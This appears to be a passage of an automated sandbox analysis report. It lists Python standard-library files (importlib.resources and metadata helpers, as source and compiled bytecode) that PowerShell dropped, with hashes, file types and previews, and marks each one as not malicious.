                              SSDEEP:48:Hu9gJjTxeR2Xz+u+0zOi/IRq7Xl/QlhNo+9+Xlh9B:yEjg2/nKceq+9A
                              MD5:CFE0D87F1513C3989FFAEA94FB498F39
                              SHA1:ABA83ABA5E644ECD326FD68CB30B18167F721612
                              SHA-256:A31E572E13346401BFF14A2A046DF203B970228C281455819BD11CC2C746F6AE
                              SHA-512:9D07B01347F6102D6CD04EC8D8BE97E4A6AD2CFD2874941F738236948B01B7DF7121A446DCE522B19B3405381359CE774513F36E3551E65150DFFADF708EF2ED
                              Malicious:false
                              Preview:from itertools import filterfalse......def unique_everseen(iterable, key=None):.. "List unique elements, preserving order. Remember all elements ever seen.".. # unique_everseen('AAAABBBCCDAABBB') --> A B C D.. # unique_everseen('ABBCcAD', str.lower) --> A B C D.. seen = set().. seen_add = seen.add.. if key is None:.. for element in filterfalse(seen.__contains__, iterable):.. seen_add(element).. yield element.. else:.. for element in iterable:.. k = key(element).. if k not in seen:.. seen_add(k).. yield element......# copied from more_itertools 8.8..def always_iterable(obj, base_type=(str, bytes)):.. """If *obj* is iterable, return an iterator over its items::.... >>> obj = (1, 2, 3).. >>> list(always_iterable(obj)).. [1, 2, 3].... If *obj* is not iterable, return a one-item iterable containing *obj*::.... >>> obj = 1.. >>> list(always_ite
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1653
                              Entropy (8bit):4.669384473845916
                              Encrypted:false
                              SSDEEP:24:1RENC8Hr9tYIWOtG8hJsLozyFLJb5ZtR4BWYvcqjUFixt3hH:QJL9aIrttPsLo+Vb7tR4gec2j3l
                              MD5:29DC2D3706499F5BD1DCBE6ABD1E6A06
                              SHA1:94531A6B069A2C88AFC14F6D0A060BE3157844DE
                              SHA-256:D84BAADE84952A90014A0FDB70BE6716726E669A897D7C261EA99E38385BB62E
                              SHA-512:8D90E3D2D45BA1636A6AC61A8C1A7F9473B2D70DD2329879013946ECAB4E4342EB9471D2F3308FCF70A020C28872A40FD8152ED113B892194E56AA4DEFD5BCC6
                              Malicious:false
                              Preview:from typing import Protocol..from typing import Any, Dict, Iterator, List, Optional, TypeVar, Union, overload......_T = TypeVar("_T")......class PackageMetadata(Protocol):.. def __len__(self) -> int:.. ... # pragma: no cover.... def __contains__(self, item: str) -> bool:.. ... # pragma: no cover.... def __getitem__(self, key: str) -> str:.. ... # pragma: no cover.... def __iter__(self) -> Iterator[str]:.. ... # pragma: no cover.... @overload.. def get(self, name: str, failobj: None = None) -> Optional[str]:.. ... # pragma: no cover.... @overload.. def get(self, name: str, failobj: _T) -> Union[str, _T]:.. ... # pragma: no cover.... # overload per python/importlib_metadata#435.. @overload.. def get_all(self, name: str, failobj: None = None) -> Optional[List[Any]]:.. ... # pragma: no cover.... @overload.. def get_all(self, name: str, failobj: _T) -> Union[List[Any], _T]:.. """.. R
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2265
                              Entropy (8bit):4.649909401623028
                              Encrypted:false
                              SSDEEP:48:BUu/H8O42w9/2kz8/WVy1wux7QcY5Djwa7TrbjmfVbp5bWYjE7faS5Egwz0u3v:BUM8O1w9/2kz8/W41wA7QcenFq1R3v
                              MD5:EFD66631577D71C781E1C625F9F41FDA
                              SHA1:BE295E4B93AD7EC6471FE64A3B6403E96FF58F63
                              SHA-256:7E89957A504AED6B3F93B0718CA881B6CA9F8D0BF961701B0C0A37A3B55EAACD
                              SHA-512:D6FA08CE02D1BDDA89B2E65AFC8B14E9965140573955AF45CD12FF2DBE15F1BE6DAE879622E75424E68E18AB9E97A368CF197253EBA6A0B7241A3031E758C0CE
                              Malicious:false
                              Preview:import re....from ._functools import method_cache......# from jaraco.text 3.5..class FoldedCase(str):.. """.. A case insensitive string class; behaves just like str.. except compares equal when the only variation is case..... >>> s = FoldedCase('hello world').... >>> s == 'Hello World'.. True.... >>> 'Hello World' == s.. True.... >>> s != 'Hello World'.. False.... >>> s.index('O').. 4.... >>> s.split('O').. ['hell', ' w', 'rld'].... >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])).. ['alpha', 'Beta', 'GAMMA'].... Sequence membership is straightforward..... >>> "Hello World" in [s].. True.. >>> s in ["Hello World"].. True.... You may test for set inclusion, but candidate and elements.. must both be folded..... >>> FoldedCase("Hello World") in {s}.. True.. >>> s in {FoldedCase("Hello World")}.. True.... String inclusion works as long as the FoldedCase object.. is on the right..... >>> "hello"
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):339
                              Entropy (8bit):4.793460663096757
                              Encrypted:false
                              SSDEEP:6:INgUrW/EmFqMz/ZWJaM+zowdXLXzLW/MxCgtdzJG4Vdi03AoiDiOB544V1hre:IrUEyqs1zH5jnUMxptdz44HYDiOn44Tk
                              MD5:38015D56A79137F7CB169139F2CC2C82
                              SHA1:EAF4A1DB5061E83C8FD33C21E51A3921BC535997
                              SHA-256:5FB5AE1DCF4C24BDDDCEF0487DC0F5E9A7917C5280E7A993617A96C1FFF25730
                              SHA-512:0C039DCF0EFA48921D18C20020AEE210E104BB959E8C239CDB6990C0BDC489D2ECF4EF9A4BA0C837D70B97E3FD8C7B6CD09B3C71D2CC8A1FDB019AE1E35AAAE7
                              Malicious:false
                              Preview:"""..Compatibility shim for .resources.readers as found on Python 3.10.....Consumers that can rely on Python 3.11 should use the other..module directly..."""....from .resources.readers import (.. FileReader, ZipReader, MultiplexedPath, NamespaceReader,..)....__all__ = ['FileReader', 'ZipReader', 'MultiplexedPath', 'NamespaceReader']..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):542
                              Entropy (8bit):4.405609390874925
                              Encrypted:false
                              SSDEEP:12:S6JNiV55uud2X4Jf40+yGtOUxADonYlJoVW/dXCBIOtcTy+:pJNQ50cJfF+y8OqnYlsW4cTh
                              MD5:4C88EC58675223F93130B8C91BD01019
                              SHA1:DA55D65401FDD729E8BA3B9C4F26488B753F2A79
                              SHA-256:09FF374BDF81082CC52EA40C0F6ED172342BD6533A0196E4642CCE52B9852FF1
                              SHA-512:164AB05B60AEB38D1E8E83229BC119208A8002CED939F8190CD8782C74D77EEA4BDA5D391DEBA628037F3A13A45ADDCA27436677FBF725298C6DC8CF055A9D03
                              Malicious:false
                              Preview:"""Read resources contained within a package."""....from ._common import (.. as_file,.. files,.. Package,..)....from ._legacy import (.. contents,.. open_binary,.. read_binary,.. open_text,.. read_text,.. is_resource,.. path,.. Resource,..)....from .abc import ResourceReader......__all__ = [.. 'Package',.. 'Resource',.. 'ResourceReader',.. 'as_file',.. 'contents',.. 'files',.. 'is_resource',.. 'open_binary',.. 'open_text',.. 'path',.. 'read_binary',.. 'read_text',..]..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):654
                              Entropy (8bit):5.198131057863074
                              Encrypted:false
                              SSDEEP:12:hcnl0iCSBOToVYbcjPi6MCxfXhMY4myyxOHt28sWnBI5CebaYtY3fet:hcl/C90VYGP5M6M5myyxOHA8nFVaY36
                              MD5:2774A0462C6F5350C2BB492ED75DFD82
                              SHA1:9A771BB97EEEEAB737ABD41FC376C2B3799DAA1C
                              SHA-256:8D51041CEB33F272F9AE124373AA38C366D5808D49B80E97DA38C61F29D8AEDC
                              SHA-512:527856B358DAD98FEABDDB13C28C705A19462AAE9A99985BDB44CEB5AC11A94D68024B2C8683F5F4D010CEC6833B37CDC3E0F05B5EC3DA93E86B18D52B21D436
                              Malicious:false
                              Preview:.........U.f..........................X.....d.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z.y.).z*Read resources contained within a package......)...as_file..files..Package)...contents..open_binary..read_binary..open_text..read_text..is_resource..path..Resource)...ResourceReader).r....r....r....r....r....r....r....r....r....r....r....r....N)...__doc__.._commonr....r....r......_legacyr....r....r....r....r....r....r....r......abcr......__all__........ZC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\resources\__init__.py..<module>r........s-..........0............................. .......r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):9665
                              Entropy (8bit):4.886223930886199
                              Encrypted:false
                              SSDEEP:96:wlawOb2TuDuJg8jJBivDs9ECvQWxxU0dfXJlPMJ6JVdSORSA0LNPqPUxJIO7+jOv:Q7AzDuNj+vwEfOndfj0CyAcPDJ971ehw
                              MD5:2F063F62D9A7D1CC797315B28A98B9A1
                              SHA1:5A2EA440447E71A91A18ED118DA60BEBE78315D3
                              SHA-256:491C6D9C4A7741DDA2933A176F36723C79D6BC923A6C199B509DD347A3FB9941
                              SHA-512:7B85E1CAA61FDE7CF3D0FC19E870CD66D298DE63D23754CE2E23C0C8C1BF360F4F85E71040DAC22CD6B746F5150E30F01DABBDCA723B6527EAA3DF1FB68A1931
                              Malicious:false
                              Preview:.........U.f*.........................r.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z...G.d...d.........Z.d.d...Z...G.d...d.........Z.d...Z.y.)......)...suppress)...TextIOWrapper.....)...abcc.....................".....e.Z.d.Z.d.Z.d...f.d...Z.d...Z.y.)...SpecLoaderAdapterz>. Adapt a package spec to adapt the underlying loader.. c...........................|.j...................S...N)...loader....specs.... .[C:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\resources\_adapters.py..<lambda>z.SpecLoaderAdapter.<lambda>....s.......$.+.+.......c.....................,.....|.|._...........|.|.........|._.........y.r....).r....r....)...selfr......adapters.... r......__init__z.SpecLoaderAdapter.__init__....s.................d.m....r....c...........................t.........|.j...................|.........S.r....)...getattrr......r......names.... r......__getattr__z.SpecLoaderAdapter.__getattr__....s..........t.y.y.$..'..'r....N)...__name__..__module__.._
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):8750
                              Entropy (8bit):5.129854591592077
                              Encrypted:false
                              SSDEEP:192:Qd5+d0XTItslL3RhUzspJWi/RcVEedBJaGSmnubh05BhQbNQ8TAd2:QP+dIyslL3HUzspJWi2WedLaGg9010Qy
                              MD5:192183DBBE13740895C47811615CECC3
                              SHA1:3565DBB1B81CBB766E5D0BD03BBE9B143C76DE39
                              SHA-256:43A86CE309E05DBBF0AB241E7F963CC4CAA4C64DA3B687CE7B9F60FF15E20749
                              SHA-512:C1A422D0A611EC1D56BC9C7327805595CD739B896282C3A56AABBB71CFC66BDFEEB750F94ED740F972DEB0C5E31F607DCA680110595BF13CBE90F98509453764
                              Malicious:false
                              Preview:.........U.f".........................2.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.e.j&..................e.f.....Z.e.Z.d...Z.e.d.d.e.e.....d.e.f.d...........Z.d.e.j&..................d.e.e.....f.d...Z.e.j4..................d.e.e.....d.e.j&..................f.d...........Z.e.j8..................d.e.d.e.j&..................f.d...........Z.e.j8..................d.d.d.e.j&..................f.d...........Z.d...Z.d.e.j&..................f.d...Z.e.j@....................d.e.jB..................d...d...........Z"d...Z#d.e.d.e$f.d...Z%e.j4..................d...........Z&e&j9..................e.jN..........................e.j@..................d...................Z.e.j@..................d.e.jP..................f.d...........Z)e.j@..................d...........Z*d...Z+y.)......N)...Union..Optional..cast.....)...ResourceReader..Traversable)...wrap_specc.....................`.........t...................t.....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1578
                              Entropy (8bit):5.54373693949275
                              Encrypted:false
                              SSDEEP:24:hWBKSJoSXFQMS3LJw1BI93wmq9sVC0vMByBh5FsJ7dFpeTRK5:EXlTB9sg0v8mrsJ7dF4K5
                              MD5:81C250FE3023A56C10CB4061DDF41C5E
                              SHA1:0709AFE2335D5BAD84291DA6F93205FF0F863EDD
                              SHA-256:D2D20BEBEA50FE618F7D1C085C812E644017C0EC549EED52C56C02A183A3456E
                              SHA-512:FE926DE0EAFCD6D9D35FFD3EA1466AED917C52E1BF357FDD54119DE8619B2FB1CDFB9104CF8560BA61CB11A1C567DD5BF71E4A0B3072E455DF8E04CEEA6F64D8
                              Malicious:false
                              Preview:.........U.f#...............................d.d...Z.y.).Nc..........................t.........|.........}.t.........|.|.........}...t.........|.........}.d.j...................|.|.........}.|.x.s...t.........|...........#.t.........$.r...Y.|.S.w.x.Y.w.).a(...If *iterable* has only one item, return it.. If it has zero items, return *default*.. If it has more than one item, raise the exception given by *too_long*,. which is ``ValueError`` by default.. >>> only([], default='missing'). 'missing'. >>> only([1]). 1. >>> only([1, 2]) # doctest: +IGNORE_EXCEPTION_DETAIL. Traceback (most recent call last):. .... ValueError: Expected exactly one item in iterable, but got 1, 2,. and perhaps more.'. >>> only([1, 2], too_long=TypeError) # doctest: +IGNORE_EXCEPTION_DETAIL. Traceback (most recent call last):. .... TypeError. Note that :func:`only` attempts to advance *iterable* twice to ensure there. is only one item. See :func:`spy` or :fun
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):5782
                              Entropy (8bit):5.307330315393467
                              Encrypted:false
                              SSDEEP:96:I9nWzimJ9trwNKl9/wNkmtTCmyTlqTJYjb2yz0l9mJ7NOeLtojqjBfnY2iw:I9nWziq9tsNKl94DtOmttYP249XroAnH
                              MD5:DED903550F158E97CCA0718E7C9D9814
                              SHA1:0048B491103E3298C3632A751F8C8D8E896A327F
                              SHA-256:37224082BF88E8700C4FAB0FE2BF7593FE963BF89BFCDD4FA1C2AED865CA6743
                              SHA-512:C915AB87D3DEBB5E0BFDD8D7495DB3B3310FF9CE31E1B36D4DED26663C25773C6651750D546940DA40FB242504726C81E1985570EBC3429F0F503B8EF9481FD1
                              Malicious:false
                              Preview:.........U.f...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.e.j...................e.f.....Z.e.Z.d...Z.d.e.d.e.f.d...Z.e.d.e.d.e.d.e.f.d...........Z.e.d.e.d.e.d.e.f.d...........Z.e.....d.d.e.d.e.d.e.d.e.d.e.f.d...........Z.e.....d.d.e.d.e.d.e.d.e.d.e.f.d...........Z.e.d.e.d.e.e.....f.d...........Z.e.d.e.d.e.d.e.f.d...........Z.e.d.e.d.e.d.e.e.j8......................f.d...........Z.y.)......N)...Union..Iterable..ContextManager..BinaryIO..TextIO..Any.....)..._commonc.....................B.......t.........j...............................f.d...........}.|.S.).Nc.....................f.......t.........j.....................j.....................d...t.........d.................|.i.|.....S.).Nz. is deprecated. Use files() instead. Refer to https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy for migration advice......)...stacklevel)...warnings..warn..__name__..DeprecationWarning)...args..kwar
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):8960
                              Entropy (8bit):5.135086999590449
                              Encrypted:false
                              SSDEEP:192:pKnhstTDABD9d5m0ZFoHH2dQIbWsfN24vJ0:ptdA604XE0q2
                              MD5:240EFEBB6094D452F184A45683491771
                              SHA1:F3DE72C58ECA3F455D70A44BBF6D4DC8C04CAE2D
                              SHA-256:359A4B1E18AB3E45FC44EB4D4D4332BF4B8E053846DF4970035DC861C071139B
                              SHA-512:C536B1E53DE4C024CA2F6A77C95A6EB6CBCCB7C62912751CE478BD8F8846E144D4D3099DF7D68245C230B772314451914B21451A0547FD8DD024297A0FEB8F2A
                              Malicious:false
                              Preview:.........U.f................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.e.e.j"..................e.....f.....Z.g.d...Z...G.d...d.e.j(............................Z...G.d...d.e.........Z.e...G.d...d.e.................Z...G.d...d.e.........Z.y.)......N)...Any..BinaryIO..Iterable..Iterator..NoReturn..Text..Optional)...runtime_checkable..Protocol)...Union)...ResourceReader..Traversable..TraversableResourcesc...........................e.Z.d.Z.d.Z.e.j...................d.e.d.e.f.d...........Z.e.j...................d.e.d.e.f.d...........Z.e.j...................d.e.d.e.f.d...........Z.e.j...................d.e.e.....f.d...........Z.y.).r....zDAbstract base class for loaders to provide resource reading support...resource..returnc...........................t...........).z.Return an opened, file-like object for binary reading... The 'resource' argument is expected to represent only a file name.. If the resou
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):8933
                              Entropy (8bit):5.014522239791881
                              Encrypted:false
                              SSDEEP:192:5PfDS58alVNMBTuuJ4p/7QgDzEfffQo7sqCPAS4a+fIsV+2jq:df25rNMBCuIFm4T2O
                              MD5:3043BDE5ADC5703DCA6382206C38D4AB
                              SHA1:2E26CD822234011BA93E078C7F9EB2C75FB880A8
                              SHA-256:91EAC23C954068F36986BFDF00E5C3FAEA6971FFD8745DE255CB2D348A34C33B
                              SHA-512:D2AD60BD8BA7E716347B5C20B59BB54C0F5CD9EBE18BFDA1112A4E3094DD623F2149F03FE3DCFAD1C75D0D2105EF8D15271D7827D52ED17F38DC0BE263B6BD86
                              Malicious:false
                              Preview:.........U.f_...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d...Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.y.)......N.....)...abc)...onlyc.....................R.....t.........t.........j...................j...................|.................S...N)...iter..collections..OrderedDict..fromkeys)...itemss.... .YC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\resources\readers.py..remove_duplicatesr........s.............'..'..0..0....7..8..8.....c...........................e.Z.d.Z.d...Z.d...Z.d...Z.y.)...FileReaderc.....................`.....t.........j...................|.j...........................j...................|._.........y.r....)...pathlib..Path..path..parent)...self..loaders.... r......__init__z.FileReader.__init__....s..........L.L........-..4..4....r....c.....................J.....t.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4650
                              Entropy (8bit):4.366030348359478
                              Encrypted:false
                              SSDEEP:96:qE644hrU2ksTZpvIbGK/Lm//LgaPOUkGCVWOHqcznMqf:AhrU5sNpvDK/I/ZPO/GCZHqsMqf
                              MD5:CF4C239F8AA86FC461C68622C4F3C8CC
                              SHA1:19A8DAD58DA165E1C655A47649BC8DF7D7146C34
                              SHA-256:570783F57345F54C4348F1906BE59DDED85159B31AB92FD5D7EF80FE36156BBC
                              SHA-512:1D9752AAC74D391FADDE817B4027B3C519774283174BB3AD77A4F3BCE303FEF2F821752D90A20C19FEEE2A34663F89F724DD3FE0003409DB8207D2BA1104546A
                              Malicious:false
                              Preview:from contextlib import suppress..from io import TextIOWrapper....from . import abc......class SpecLoaderAdapter:.. """.. Adapt a package spec to adapt the underlying loader... """.... def __init__(self, spec, adapter=lambda spec: spec.loader):.. self.spec = spec.. self.loader = adapter(spec).... def __getattr__(self, name):.. return getattr(self.spec, name)......class TraversableResourcesLoader:.. """.. Adapt a loader to provide TraversableResources... """.... def __init__(self, spec):.. self.spec = spec.... def get_resource_reader(self, name):.. return CompatibilityFiles(self.spec)._native()......def _io_wrapper(file, mode='r', *args, **kwargs):.. if mode == 'r':.. return TextIOWrapper(file, *args, **kwargs).. elif mode == 'rb':.. return file.. raise ValueError(f"Invalid mode value '{mode}', only 'r' and 'rb' are supported")......class CompatibilityFiles:.. """.. Adapter for an existing or no
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5666
                              Entropy (8bit):4.65663491701135
                              Encrypted:false
                              SSDEEP:96:Cx8GjAvLHnDAhS89SFZIyHf4mbA+UC1d/mWEBP1J2HE3VIXH/ZR9Q3/2EkqRZxzd:Cb2Gv9gLf4mUxC1d+fBPuHE3VIXHRRC9
                              MD5:C504069E4691E456C488DFB7515B3741
                              SHA1:4538122DE68757CF58EE7DD3F03D24DE43B22AA4
                              SHA-256:FE1554DC2BC912808BB2697D36726B71A0F0CF93984471A578C52673C4141ED5
                              SHA-512:7F7547A8F3A0299465A720E44099254BE9735A64AEAB8163368B061C6F74BD9448A177D7B2ECFED356B38BF3C6FA42D128273BF490F266B9CC8B3F4081B9DF6F
                              Malicious:false
                              Preview:import os..import pathlib..import tempfile..import functools..import contextlib..import types..import importlib..import inspect..import warnings..import itertools....from typing import Union, Optional, cast..from .abc import ResourceReader, Traversable....from ._adapters import wrap_spec....Package = Union[types.ModuleType, str]..Anchor = Package......def package_to_anchor(func):.. """.. Replace 'package' parameter as 'anchor' and warn about the change..... Other errors should fall through..... >>> files('a', 'b').. Traceback (most recent call last):.. TypeError: files() takes from 0 to 1 positional arguments but 2 were given.. """.. undefined = object().... @functools.wraps(func).. def wrapper(anchor=undefined, package=undefined):.. if package is not undefined:.. if anchor is not undefined:.. return func(anchor, package).. warnings.warn(.. "First parameter to files is renamed to 'anchor'",..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1315
                              Entropy (8bit):4.769536521565181
                              Encrypted:false
                              SSDEEP:24:VpcExocjBVVJJwOBEVaJq91VCZF16OmXkKZdBL4gos:7fV+SEl91gZF16HhLBos
                              MD5:3E324E7E7C9F78C12B5896CE5EAED29C
                              SHA1:82A915F32E36CC70D447E8A070627F27E5C87DC9
                              SHA-256:D509A9DA20DC9619FD2AC63F30CC088599995D3E1B38B1EE5AA68FB697DE8897
                              SHA-512:48DB1AA5CB305D99E98D1E396454812052A7FA9CB5C53BBC30CD8F4B90DC2F031C8E4F42CE0CA883E0A1BDB2222B240F48802B460DD8B2753A6B1896C7FB7BA8
                              Malicious:false
                              Preview:# from more_itertools 9.0..def only(iterable, default=None, too_long=None):.. """If *iterable* has only one item, return it... If it has zero items, return *default*... If it has more than one item, raise the exception given by *too_long*,.. which is ``ValueError`` by default... >>> only([], default='missing').. 'missing'.. >>> only([1]).. 1.. >>> only([1, 2]) # doctest: +IGNORE_EXCEPTION_DETAIL.. Traceback (most recent call last):.. ..... ValueError: Expected exactly one item in iterable, but got 1, 2,.. and perhaps more.'.. >>> only([1, 2], too_long=TypeError) # doctest: +IGNORE_EXCEPTION_DETAIL.. Traceback (most recent call last):.. ..... TypeError.. Note that :func:`only` attempts to advance *iterable* twice to ensure there.. is only one item. See :func:`spy` or :func:`peekable` to check.. iterable contents less destructively... """.. it = iter(iterable).. first_value = next(it, default).... try:.. s
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3601
                              Entropy (8bit):4.695501803485121
                              Encrypted:false
                              SSDEEP:96:gi899q0MTty/UuRfAVfKVEODgEdr0GolnN02qPfyRG:gaBTg/9ZAFKWOBd0GolN026yRG
                              MD5:C6783656BCAF6DF484F007E8E322EE7A
                              SHA1:6F11C1CD08C4731AED995774D8765409FFE4AE21
                              SHA-256:3A0FF12B9FA46E82847D8709A756B3531BAC8BE10916DACFAE7B1A8570362DA2
                              SHA-512:8D0802368FCCA56E2DFF0EFD487AF62B3E3C845CCD3A36E9347DAF9AA35092550E640D443DA60FD01464534144DD8F3E1E41B71AC24FF07B432DED27F4E984B7
                              Malicious:false
                              Preview:import functools..import os..import pathlib..import types..import warnings....from typing import Union, Iterable, ContextManager, BinaryIO, TextIO, Any....from . import _common....Package = Union[types.ModuleType, str]..Resource = str......def deprecated(func):.. @functools.wraps(func).. def wrapper(*args, **kwargs):.. warnings.warn(.. f"{func.__name__} is deprecated. Use files() instead. ".. "Refer to https://importlib-resources.readthedocs.io".. "/en/latest/using.html#migrating-from-legacy for migration advice.",.. DeprecationWarning,.. stacklevel=2,.. ).. return func(*args, **kwargs).... return wrapper......def normalize_path(path: Any) -> str:.. """Normalize a path by ensuring it is a string..... If the resulting string contains path separators, an exception is raised... """.. str_path = str(path).. parent, file_name = os.path.split(str_path).. if parent:.. raise ValueError
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5376
                              Entropy (8bit):4.505175660902373
                              Encrypted:false
                              SSDEEP:96:EfRHVKW/YO/Kmu96frLOmzFn+IKetz7P6:EzK+uIGmBn+IKetzO
                              MD5:4CD3C9FC84D12E05946043AAB3539FAB
                              SHA1:78CBCE0C7330CFA5FDD6E3EBECE5F8955BBF2112
                              SHA-256:F66D4D78AE31FF360C36F18BE66000326AACAFB4CE851C5B10648B7C75F42333
                              SHA-512:F2155A454A346C3F56BD0085A58A3A5B7366DB552B49EEC2B4D0CB28E0D788CA7BFEBA26E1342356C93119CE274215DCF547511F67D60CB162A99F27A89B5069
                              Malicious:false
                              Preview:import abc..import io..import itertools..import os..import pathlib..from typing import Any, BinaryIO, Iterable, Iterator, NoReturn, Text, Optional..from typing import runtime_checkable, Protocol..from typing import Union......StrPath = Union[str, os.PathLike[str]]....__all__ = ["ResourceReader", "Traversable", "TraversableResources"]......class ResourceReader(metaclass=abc.ABCMeta):.. """Abstract base class for loaders to provide resource reading support.""".... @abc.abstractmethod.. def open_resource(self, resource: Text) -> BinaryIO:.. """Return an opened, file-like object for binary reading..... The 'resource' argument is expected to represent only a file name... If the resource cannot be found, FileNotFoundError is raised... """.. # This deliberately raises FileNotFoundError instead of.. # NotImplementedError so that if this method is accidentally called,.. # it'll still do the right thing... raise FileNotFoundError..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4447
                              Entropy (8bit):4.528929673079825
                              Encrypted:false
                              SSDEEP:96:NZKcTSJI0J8mEbHt5sr4d8NvQCd5LHnorJeAi:NRSf3EbHtCrY8NvQCbLHor8L
                              MD5:FF26E45B1D6849065272607BF12C7016
                              SHA1:5E27C831CBD6431C8D89520C83C2024810007D9C
                              SHA-256:3E447AA8A544F61ED834FBD3720CA6991843E8DE60D50C5E002A9B473EDB8AE3
                              SHA-512:DEF1011D4E9E758E08F78416D927551CDF3D1A0EC894441F2D10C79B60AC05F970C37DAFA6A614B5F3C4C762769038DDE6ED1D16A32AB1A7B9C9385FD965E02C
                              Malicious:false
                              Preview:import collections..import itertools..import pathlib..import operator..import zipfile....from . import abc....from ._itertools import only......def remove_duplicates(items):.. return iter(collections.OrderedDict.fromkeys(items))......class FileReader(abc.TraversableResources):.. def __init__(self, loader):.. self.path = pathlib.Path(loader.path).parent.... def resource_path(self, resource):.. """.. Return the file system path to prevent.. `resources.path()` from creating a temporary.. copy... """.. return str(self.path.joinpath(resource)).... def files(self):.. return self.path......class ZipReader(abc.TraversableResources):.. def __init__(self, loader, module):.. _, _, name = module.rpartition('.').. self.prefix = loader.prefix.replace('\\', '/') + name + '/'.. self.archive = loader.archive.... def open_resource(self, resource):.. try:.. return super().open_resource(resourc
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2690
                              Entropy (8bit):4.526701396390816
                              Encrypted:false
                              SSDEEP:48:KGo0Zq8U4hoqG2w0Tkr00gq+FtN2PNShmUfHYmxd:KGo38FoudENgLQ8hN4mxd
                              MD5:BAE9438D5F515335B7715B07087B1AD7
                              SHA1:AAEBCBC814BC35F05231F20EC98058699C0304D5
                              SHA-256:36D8A88A01A4A7166461A99F66A7F06E819B2938BC3057C73498FBC576082B81
                              SHA-512:93C73E91E174BDF49C8ACEECCFDBF6C4A842BDB06E18A26C0998DF01212C81823463D0C0FC59DACAF3D27A946D1C186A002205B349F549905177BECAC33C57FE
                              Malicious:false
                              Preview:"""..Interface adapters for low-level readers..."""....import abc..import io..import itertools..from typing import BinaryIO, List....from .abc import Traversable, TraversableResources......class SimpleReader(abc.ABC):.. """.. The minimum, low-level interface required from a resource.. provider... """.... @property.. @abc.abstractmethod.. def package(self) -> str:.. """.. The name of the package for which this reader loads resources... """.... @abc.abstractmethod.. def children(self) -> List['SimpleReader']:.. """.. Obtain an iterable of SimpleReader for available.. child containers (e.g. directories)... """.... @abc.abstractmethod.. def resources(self) -> List[str]:.. """.. Obtain available named resources for this virtual package... """.... @abc.abstractmethod.. def open_binary(self, resource: str) -> BinaryIO:.. """.. Obtain a File-like for a named resource...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):368
                              Entropy (8bit):4.7550177135351435
                              Encrypted:false
